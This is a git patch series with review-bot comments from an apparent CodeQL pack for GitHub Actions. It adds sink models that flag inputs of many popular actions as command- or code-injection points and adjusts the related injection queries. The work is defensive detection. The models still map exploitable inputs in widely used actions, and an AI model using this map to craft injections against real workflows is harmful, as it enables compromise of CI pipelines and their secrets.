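Review bot: The `@id` is now unique, but `@name` (line 2 of the file, outside this hunk) is still the same `Command built from user-controlled sources` as in CommandInjection.ql, so the two queries are indistinguishable by name in Code Scanning alert lists and SARIF viewers. `@name Command built from user-controlled sources in a privileged workflow` (or similar) would make the critical variant recognisable at a glance.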
@@ -40,5 +40,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CodeInjection.ql b/ql/src/Security/CWE-094/CodeInjection.ql index 7ad0e98bc492..bc2dbffdcdf8 100644 --- a/ql/src/Security/CWE-094/CodeInjection.ql +++ b/ql/src/Security/CWE-094/CodeInjection.ql @@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -36,5 +36,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-094/CriticalCodeInjection.ql b/ql/src/Security/CWE-094/CriticalCodeInjection.ql index 5a4bbaca034a..2a1e4388d24e 100644 --- a/ql/src/Security/CWE-094/CriticalCodeInjection.ql +++ b/ql/src/Security/CWE-094/CriticalCodeInjection.ql @@ -6,7 +6,7 @@ * @problem.severity error * @security-severity 9 * @precision high - * @id actions/code-injection + * @id actions/critical-code-injection * @tags actions * security * external/cwe/cwe-094 
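Review bot: The new message `Potential critical command injection in $@` reads as if "critical" were a kind of injection; what is critical is the finding, because the source's workflow runs on a privileged trigger. `"Potential command injection in $@, which may be controlled by an external user, in a workflow run on a privileged trigger."` conveys that to the triager and mirrors the `hasTriggerEvent` condition a few lines above.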
@@ -20,7 +20,7 @@ import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow private class CodeInjectionSink extends DataFlow::Node { - CodeInjectionSink() { externallyDefinedSink(this, "request-forgery") } + CodeInjectionSink() { externallyDefinedSink(this, "code-injection") } } private module MyConfig implements DataFlow::ConfigSig { @@ -42,5 +42,5 @@ where w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential critical code injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3675597fcd74..d665a368991d 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -33,5 +33,5 @@ import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink where MyFlow::flowPath(source, sink) select sink.getNode(), source, sink, - "Potential expression injection in $@, which may be controlled by an external user.", sink, + "Potential request forgery in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() From 1e64b18212fcc69a7d829bf3ae68d84045b9639f Mon Sep 17 00:00:00 2001 From: Jorge <46056498+jorgectf@users.noreply.github.com> Date: Thu, 14 Mar 2024 19:09:22 +0100 Subject: [PATCH 116/707] Add suite that runs all queries --- ql/src/codeql-suites/actions-all.qls | 2 ++ 1 file changed, 2 insertions(+) create mode 100644 ql/src/codeql-suites/actions-all.qls diff --git a/ql/src/codeql-suites/actions-all.qls b/ql/src/codeql-suites/actions-all.qls new file mode 100644 index 000000000000..2439b95a8e55 --- /dev/null +++ b/ql/src/codeql-suites/actions-all.qls 
@@ -0,0 +1,2 @@ +- description: Standard Code Scanning queries for Actions +- queries: . \ No newline at end of file From d26ead7c3bfd9a609165f70791127538aea1f486 Mon Sep 17 00:00:00 2001 
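Review bot: `- queries: .` selects every `.ql` under the pack with no exclusion, so any debugging or experimental query added later ends up in scan results for users of this suite. If the pack adopts a tag for such queries, pairing the instruction with an `exclude` step, e.g. `- exclude: { tags contain: debug }`, keeps the suite to real findings. The description also says "Standard Code Scanning queries" while the suite is the all-queries one; `All queries for Actions` would be accurate, and the file is missing a trailing newline.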
From: jorgectf Date: Wed, 13 Mar 2024 23:22:13 +0100 Subject: [PATCH 117/707] Add security sinks --- ql/lib/ext/8398a7_action-slack.model.yml | 6 +++++ ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 15 ++++++++++++ ...nnn_action-semantic-pull-request.model.yml | 6 +++++ ql/lib/ext/anchore_sbom-action.model.yml | 10 ++++++++ ql/lib/ext/anchore_scan-action.model.yml | 6 +++++ .../ext/andresz1_size-limit-action.model.yml | 9 +++++++ ql/lib/ext/asdf-vm_actions.model.yml | 6 +++++ .../axel-op_googlejavaformat-action.model.yml | 7 ++++++ ql/lib/ext/azure_powershell.model.yml | 6 +++++ ql/lib/ext/bahmutov_npm-install.model.yml | 6 +++++ .../blackducksoftware_github-action.model.yml | 8 +++++++ .../bufbuild_buf-breaking-action.model.yml | 6 +++++ ql/lib/ext/bufbuild_buf-lint-action.model.yml | 5 ++++ .../ext/bufbuild_buf-setup-action.model.yml | 7 ++++++ ql/lib/ext/cachix_cachix-action.model.yml | 6 +++++ ql/lib/ext/changesets_action.model.yml | 7 ++++++ .../ext/cloudflare_wrangler-action.model.yml | 7 ++++++ .../crazy-max_ghaction-chocolatey.model.yml | 6 +++++ .../crazy-max_ghaction-import-gpg.model.yml | 2 +- ...cycjimmy_semantic-release-action.model.yml | 8 +++++++ ql/lib/ext/cypress-io_github-action.model.yml | 6 +++++ .../ext/dailydotdev_action-devcard.model.yml | 7 ++++++ ...me_reportgenerator-github-action.model.yml | 6 +++++ .../daspn_private-actions-checkout.model.yml | 7 ++++++ .../dawidd6_action-ansible-playbook.model.yml | 7 ++++++ ...dawidd6_action-download-artifact.model.yml | 6 +++++ ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- ...tesystems_magic-nix-cache-action.model.yml | 11 +++++++++ ...er-practice_actions-setup-docker.model.yml | 8 +++++++ ql/lib/ext/docker_build-push-action.model.yml | 6 +++++ ql/lib/ext/endbug_latest-tag.model.yml | 9 +++++++ ql/lib/ext/expo_expo-github-action.model.yml | 7 ++++++ ...seextended_action-hosting-deploy.model.yml | 6 +++++ 
ql/lib/ext/gabrielbb_xvfb-action.model.yml | 7 ++++++ ql/lib/ext/game-ci_unity-builder.model.yml | 7 ++++++ .../ext/game-ci_unity-test-runner.model.yml | 2 +- ...autamkrishnar_blog-post-workflow.model.yml | 6 +++++ .../ext/go-semantic-release_action.model.yml | 6 +++++ .../golangci_golangci-lint-action.model.yml | 6 +++++ .../ext/gonuit_heroku-docker-deploy.model.yml | 7 ++++++ .../goreleaser_goreleaser-action.model.yml | 6 +++++ ...te-or-update-pull-request-action.model.yml | 9 +++++++ ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 9 +++++++ ql/lib/ext/ilammy_setup-nasm.model.yml | 7 ++++++ ql/lib/ext/imjohnbo_issue-bot.model.yml | 8 +++++++ ql/lib/ext/iterative_setup-cml.model.yml | 6 +++++ ql/lib/ext/iterative_setup-dvc.model.yml | 6 +++++ ...sives_github-pages-deploy-action.model.yml | 11 +++++++++ .../ext/johnnymorganz_stylua-action.model.yml | 6 +++++ .../ext/jurplel_install-qt-action.model.yml | 11 +++++++++ ql/lib/ext/jwalton_gh-ecr-push.model.yml | 7 ++++++ ql/lib/ext/leafo_gh-actions-lua.model.yml | 7 ++++++ .../ext/leafo_gh-actions-luarocks.model.yml | 6 +++++ .../lucasbento_auto-close-issues.model.yml | 6 +++++ ql/lib/ext/magefile_mage-action.model.yml | 6 +++++ ql/lib/ext/maierj_fastlane-action.model.yml | 8 +++++++ .../manusa_actions-setup-minikube.model.yml | 9 +++++++ ql/lib/ext/mattdavis0351_actions.model.yml | 9 +++++++ .../ext/meteorengineer_setup-meteor.model.yml | 6 +++++ ql/lib/ext/microsoft_setup-msbuild.model.yml | 7 ++++++ ...hers-excellent_docker-build-push.model.yml | 16 +++++++++++++ ql/lib/ext/msys2_setup-msys2.model.yml | 7 ++++++ ql/lib/ext/mxschmitt_action-tmate.model.yml | 7 ++++++ ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 6 +++++ .../ext/nanasess_setup-chromedriver.model.yml | 6 +++++ ql/lib/ext/nanasess_setup-php.model.yml | 6 +++++ ql/lib/ext/nick-fields_retry.model.yml | 8 +++++++ ql/lib/ext/octokit_graphql-action.model.yml | 6 +++++ ql/lib/ext/octokit_request-action.model.yml | 6 +++++ ql/lib/ext/olafurpg_setup-scala.model.yml 
| 6 +++++ .../paambaati_codeclimate-action.model.yml | 6 +++++ .../peter-evans_create-pull-request.model.yml | 6 +++++ .../ext/plasmicapp_plasmic-action.model.yml | 8 +++++++ .../preactjs_compressed-size-action.model.yml | 7 ++++++ ql/lib/ext/py-actions_flake8.model.yml | 12 ++++++++++ ...py-actions_py-dependency-install.model.yml | 6 +++++ ql/lib/ext/pyo3_maturin-action.model.yml | 9 +++++++ ...vecircus_android-emulator-runner.model.yml | 24 +++++++++++++++++++ ql/lib/ext/reggionick_s3-deploy.model.yml | 13 ++++++++++ .../ext/renovatebot_github-action.model.yml | 10 ++++++++ .../ext/roots_issue-closer-action.model.yml | 7 ++++++ ql/lib/ext/ros-tooling_setup-ros.model.yml | 6 +++++ ql/lib/ext/ruby_setup-ruby.model.yml | 5 ++++ ...ction-detect-and-tag-new-version.model.yml | 5 ++++ ...skitionek_notify-microsoft-teams.model.yml | 6 +++++ ql/lib/ext/snow-actions_eclint.model.yml | 6 +++++ .../ext/stackhawk_hawkscan-action.model.yml | 10 ++++++++ .../ext/step-security_harden-runner.model.yml | 6 +++++ ql/lib/ext/tibdex_backport.model.yml | 9 +++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 15 ++++++++++++ .../tryghost_action-deploy-theme.model.yml | 7 ++++++ ql/lib/ext/veracode_veracode-sca.model.yml | 9 +++++++ .../ext/wearerequired_lint-action.model.yml | 8 +++++++ ql/lib/ext/webfactory_ssh-agent.model.yml | 8 +++++++ ql/lib/ext/zaproxy_action-baseline.model.yml | 9 +++++++ ql/lib/ext/zaproxy_action-full-scan.model.yml | 9 +++++++ .../Security/CWE-094/ExpressionInjection.ql | 3 ++- 99 files changed, 719 insertions(+), 6 deletions(-) create mode 100644 ql/lib/ext/8398a7_action-slack.model.yml create mode 100644 ql/lib/ext/amannn_action-semantic-pull-request.model.yml create mode 100644 ql/lib/ext/anchore_sbom-action.model.yml create mode 100644 ql/lib/ext/anchore_scan-action.model.yml create mode 100644 ql/lib/ext/andresz1_size-limit-action.model.yml create mode 100644 ql/lib/ext/asdf-vm_actions.model.yml 
create mode 100644 ql/lib/ext/axel-op_googlejavaformat-action.model.yml create mode 100644 ql/lib/ext/azure_powershell.model.yml create mode 100644 ql/lib/ext/bahmutov_npm-install.model.yml create mode 100644 ql/lib/ext/blackducksoftware_github-action.model.yml create mode 100644 ql/lib/ext/bufbuild_buf-setup-action.model.yml create mode 100644 ql/lib/ext/changesets_action.model.yml create mode 100644 ql/lib/ext/cloudflare_wrangler-action.model.yml create mode 100644 ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml create mode 100644 ql/lib/ext/cycjimmy_semantic-release-action.model.yml create mode 100644 ql/lib/ext/cypress-io_github-action.model.yml create mode 100644 ql/lib/ext/dailydotdev_action-devcard.model.yml create mode 100644 ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml create mode 100644 ql/lib/ext/daspn_private-actions-checkout.model.yml create mode 100644 ql/lib/ext/dawidd6_action-ansible-playbook.model.yml create mode 100644 ql/lib/ext/dawidd6_action-download-artifact.model.yml create mode 100644 ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml create mode 100644 ql/lib/ext/docker-practice_actions-setup-docker.model.yml create mode 100644 ql/lib/ext/docker_build-push-action.model.yml create mode 100644 ql/lib/ext/endbug_latest-tag.model.yml create mode 100644 ql/lib/ext/expo_expo-github-action.model.yml create mode 100644 ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml create mode 100644 ql/lib/ext/gabrielbb_xvfb-action.model.yml create mode 100644 ql/lib/ext/game-ci_unity-builder.model.yml create mode 100644 ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml create mode 100644 ql/lib/ext/go-semantic-release_action.model.yml create mode 100644 ql/lib/ext/golangci_golangci-lint-action.model.yml create mode 100644 ql/lib/ext/gonuit_heroku-docker-deploy.model.yml create mode 100644 ql/lib/ext/goreleaser_goreleaser-action.model.yml create mode 100644 
ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml create mode 100644 ql/lib/ext/ilammy_msvc-dev-cmd.model.yml create mode 100644 ql/lib/ext/ilammy_setup-nasm.model.yml create mode 100644 ql/lib/ext/imjohnbo_issue-bot.model.yml create mode 100644 ql/lib/ext/iterative_setup-cml.model.yml create mode 100644 ql/lib/ext/iterative_setup-dvc.model.yml create mode 100644 ql/lib/ext/jamesives_github-pages-deploy-action.model.yml create mode 100644 ql/lib/ext/johnnymorganz_stylua-action.model.yml create mode 100644 ql/lib/ext/jurplel_install-qt-action.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-lua.model.yml create mode 100644 ql/lib/ext/leafo_gh-actions-luarocks.model.yml create mode 100644 ql/lib/ext/lucasbento_auto-close-issues.model.yml create mode 100644 ql/lib/ext/magefile_mage-action.model.yml create mode 100644 ql/lib/ext/maierj_fastlane-action.model.yml create mode 100644 ql/lib/ext/manusa_actions-setup-minikube.model.yml create mode 100644 ql/lib/ext/meteorengineer_setup-meteor.model.yml create mode 100644 ql/lib/ext/microsoft_setup-msbuild.model.yml create mode 100644 ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml create mode 100644 ql/lib/ext/msys2_setup-msys2.model.yml create mode 100644 ql/lib/ext/mxschmitt_action-tmate.model.yml create mode 100644 ql/lib/ext/nanasess_setup-chromedriver.model.yml create mode 100644 ql/lib/ext/nanasess_setup-php.model.yml create mode 100644 ql/lib/ext/nick-fields_retry.model.yml create mode 100644 ql/lib/ext/octokit_graphql-action.model.yml create mode 100644 ql/lib/ext/octokit_request-action.model.yml create mode 100644 ql/lib/ext/olafurpg_setup-scala.model.yml create mode 100644 ql/lib/ext/paambaati_codeclimate-action.model.yml create mode 100644 ql/lib/ext/peter-evans_create-pull-request.model.yml create mode 100644 ql/lib/ext/plasmicapp_plasmic-action.model.yml create mode 100644 ql/lib/ext/preactjs_compressed-size-action.model.yml create mode 100644 
ql/lib/ext/py-actions_flake8.model.yml create mode 100644 ql/lib/ext/py-actions_py-dependency-install.model.yml create mode 100644 ql/lib/ext/pyo3_maturin-action.model.yml create mode 100644 ql/lib/ext/reactivecircus_android-emulator-runner.model.yml create mode 100644 ql/lib/ext/reggionick_s3-deploy.model.yml create mode 100644 ql/lib/ext/renovatebot_github-action.model.yml create mode 100644 ql/lib/ext/roots_issue-closer-action.model.yml create mode 100644 ql/lib/ext/ros-tooling_setup-ros.model.yml create mode 100644 ql/lib/ext/skitionek_notify-microsoft-teams.model.yml create mode 100644 ql/lib/ext/snow-actions_eclint.model.yml create mode 100644 ql/lib/ext/stackhawk_hawkscan-action.model.yml create mode 100644 ql/lib/ext/step-security_harden-runner.model.yml create mode 100644 ql/lib/ext/tibdex_backport.model.yml create mode 100644 ql/lib/ext/tripss_conventional-changelog-action.model.yml create mode 100644 ql/lib/ext/tryghost_action-deploy-theme.model.yml create mode 100644 ql/lib/ext/veracode_veracode-sca.model.yml create mode 100644 ql/lib/ext/wearerequired_lint-action.model.yml create mode 100644 ql/lib/ext/webfactory_ssh-agent.model.yml create mode 100644 ql/lib/ext/zaproxy_action-baseline.model.yml create mode 100644 ql/lib/ext/zaproxy_action-full-scan.model.yml diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml new file mode 100644 index 000000000000..e3d97adf69d4 --- /dev/null +++ b/ql/lib/ext/8398a7_action-slack.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection"] \ No newline at end of file diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml index 2ed2e03a34e7..cd409f38b59d 100644 --- a/ql/lib/ext/actions_github-script.model.yml +++ b/ql/lib/ext/actions_github-script.model.yml 
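Review bot: The row marks `input.custom_payload` as a `code-injection` sink without a comment saying why, and the version column is `*`, so nobody can later check whether a newer release of the action still evaluates the payload. If the reason is that the action evaluates `custom_payload` as JavaScript (my reading of the sink kind; please confirm against the action's source), a YAML comment such as `# custom_payload is evaluated as JavaScript by the action, so untrusted content in it is code execution` above the row would capture it. The file also lacks a trailing newline.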
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["actions/github-script","*","input.script","expression-injection"]
+ - ["actions/github-script", "*", "input.script", "code-injection"]
diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
index f370a9fe2228..ad65775e58d1 100644
--- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml
+++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
@@ -4,3 +4,18 @@ extensions:
 extensible: summaryModel
 data:
 - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.buildpack", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.region", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.stack", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.team", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.docker_heroku_process_type", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.docker_build_args", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.branch", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.appdir", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.heroku_api_key", "command-injection"]
+ - ["akhileshns/heroku-deploy", "*", "input.heroku_email", "command-injection"]
diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
new file mode 100644
index 000000000000..c530a3af9b3c
--- /dev/null
+++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
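Review bot: Renaming the sink kind from `expression-injection` to `code-injection` on the only data row silently changes which queries pick this sink up: if any query in the pack still selects `expression-injection`, the `actions/github-script` `input.script` sink stops producing results without any error. The queries are not visible from this hunk, so please confirm by searching the pack for the old kind string before merging. The new kind does line up with the other script-evaluating inputs added in this commit (`8398a7/action-slack` `input.custom_payload`, `gautamkrishnar/blog-post-workflow` `input.item_exec`).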
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"] diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml new file mode 100644 index 000000000000..c632a3a1ff25 --- /dev/null +++ b/ql/lib/ext/anchore_sbom-action.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/sbom-action", "*", "input.syft-version", "command-injection"] + - ["anchore/sbom-action", "*", "input.format", "command-injection"] + - ["anchore/sbom-action", "*", "input.path", "command-injection"] + - ["anchore/sbom-action", "*", "input.file", "command-injection"] + - ["anchore/sbom-action", "*", "input.image", "command-injection"] diff --git a/ql/lib/ext/anchore_scan-action.model.yml b/ql/lib/ext/anchore_scan-action.model.yml new file mode 100644 index 000000000000..26e5adea505b --- /dev/null +++ b/ql/lib/ext/anchore_scan-action.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["anchore/scan-action", "*", "input.grype-version", "command-injection"] diff --git a/ql/lib/ext/andresz1_size-limit-action.model.yml b/ql/lib/ext/andresz1_size-limit-action.model.yml new file mode 100644 index 000000000000..2903888a7318 --- /dev/null +++ b/ql/lib/ext/andresz1_size-limit-action.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.build_script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.script", "command-injection"] + - ["andresz1/size-limit-action", "*", "input.clean_script", "command-injection"] 
diff --git a/ql/lib/ext/asdf-vm_actions.model.yml b/ql/lib/ext/asdf-vm_actions.model.yml
new file mode 100644
index 000000000000..21dcd22c8b7f
--- /dev/null
+++ b/ql/lib/ext/asdf-vm_actions.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["asdf-vm/actions", "*", "input.before_install", "command-injection"]
\ No newline at end of file
diff --git a/ql/lib/ext/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
new file mode 100644
index 000000000000..236eade34a64
--- /dev/null
+++ b/ql/lib/ext/axel-op_googlejavaformat-action.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection"]
+ - ["axel-op/googlejavaformat-action", "*", "input.commit-message", "command-injection"]
diff --git a/ql/lib/ext/azure_powershell.model.yml b/ql/lib/ext/azure_powershell.model.yml
new file mode 100644
index 000000000000..c0e11c8201f4
--- /dev/null
+++ b/ql/lib/ext/azure_powershell.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["azure/powershell", "*", "input.azPSVersion", "command-injection"]
diff --git a/ql/lib/ext/bahmutov_npm-install.model.yml b/ql/lib/ext/bahmutov_npm-install.model.yml
new file mode 100644
index 000000000000..2841f406bdaa
--- /dev/null
+++ b/ql/lib/ext/bahmutov_npm-install.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["bahmutov/npm-install", "*", "input.install-command", "command-injection"]
diff --git a/ql/lib/ext/blackducksoftware_github-action.model.yml b/ql/lib/ext/blackducksoftware_github-action.model.yml
new file mode 100644
index 000000000000..aa060de610d9
--- /dev/null
+++ b/ql/lib/ext/blackducksoftware_github-action.model.yml
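Review bot: `asdf-vm/actions` is, as far as I know, a monorepo whose actions are consumed by sub-path (`uses: asdf-vm/actions/install@...`, `asdf-vm/actions/plugin-test@...`), so if the pack compares the first column against the full `uses:` path minus the ref, this row never matches a real step. Either confirm that the match is prefix-based or add one row per sub-action that declares the input, e.g. `- ["asdf-vm/actions/install", "*", "input.before_install", "command-injection"]`. The file also ends without a trailing newline, unlike most sibling files in this commit.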
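Review bot: The two rows differ only in the spelling of the input name (`input.commitMessage` vs `input.commit-message`); if the action's `action.yml` declares just one of them, the other is a dead row that can never match, and the mismatch reads like a guess or an undocumented legacy alias. Please confirm against the action's inputs and either drop the undeclared spelling or record why both are kept, e.g. `# both spellings are declared inputs of the action; keep in sync with action.yml`.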
@@ -0,0 +1,8 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["blackducksoftware/github-action", "*", "input.args", "command-injection"]
+ - ["blackducksoftware/github-action", "*", "input.blackduck.url", "command-injection"]
+ - ["blackducksoftware/github-action", "*", "input.blackduck.api.token", "command-injection"]
diff --git a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
index ee8e6abef097..7d5f699a0e98 100644
--- a/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-breaking-action.model.yml
@@ -4,3 +4,9 @@ extensions:
 extensible: summaryModel
 data:
 - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection"]
+ - ["bufbuild/buf-breaking-action", "*", "input.against", "command-injection"]
diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
index c58b5a1e1d2e..aeda79986314 100644
--- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml
+++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml
@@ -4,3 +4,8 @@ extensions:
 extensible: summaryModel
 data:
 - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sinkModel
+ data:
+ - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection"]
diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml
new file mode 100644
index 000000000000..38b18cf6cac8
--- /dev/null
+++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml
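Review bot: `input.blackduck.url` and `input.blackduck.api.token` carry dots inside the input name; if the pack's access-path parser splits components on `.` — the convention in Models-as-Data style paths — these would be read as input `blackduck` with nested fields and never match, while the `input.args` row in the same hunk is unaffected. Please confirm how `input.<name>` is tokenized (or whether dotted names need escaping) before relying on these two rows. Independently, `input.blackduck.api.token` is a credential input normally wired from `secrets`, so it is unlikely to yield findings even when it does match; a comment such as `# credential input: kept for completeness, rarely attacker-controlled` would save the next reader the question.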
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection"] + - ["bufbuild/buf-setup-action", "*", "input.buf_user", "command-injection"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 1c6584eb9d5d..2e4291eb480c 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -4,3 +4,9 @@ extensions: extensible: summaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cachix/cachix-action", "*", "input.installCommand", "command-injection"] + - ["cachix/cachix-action", "*", "input.cachixBin", "command-injection"] \ No newline at end of file diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml new file mode 100644 index 000000000000..3be7669275c6 --- /dev/null +++ b/ql/lib/ext/changesets_action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["changesets/action", "*", "input.publish", "command-injection"] + - ["changesets/action", "*", "input.version", "command-injection"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml new file mode 100644 index 000000000000..cb0870b4883f --- /dev/null +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection"] + - ["cloudflare/wrangler-action", "*", "input.postCommands", "command-injection"] 
diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml new file mode 100644 index 000000000000..30e59e91d60c --- /dev/null +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index d4e35196c6c1..f3b021d226b9 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] + - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml new file mode 100644 index 000000000000..25df02dacaa6 --- /dev/null +++ 